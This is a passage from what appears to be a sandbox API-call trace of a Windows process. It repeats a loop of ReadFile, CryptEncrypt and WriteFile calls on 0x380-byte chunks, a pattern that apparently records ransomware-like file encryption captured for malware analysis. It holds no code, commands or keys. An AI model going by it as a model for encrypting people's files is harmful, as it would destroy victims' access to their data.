lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.485] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.485] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.486] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.486] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.486] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.486] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.486] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.486] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.487] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.487] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.487] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.487] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.487] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.487] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.488] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.488] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.488] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.488] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.489] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.489] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.489] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.489] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.489] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.490] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.490] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.490] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.490] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.490] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.490] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.491] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.491] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.491] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.491] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.491] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.491] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.492] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.492] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.492] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.492] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, 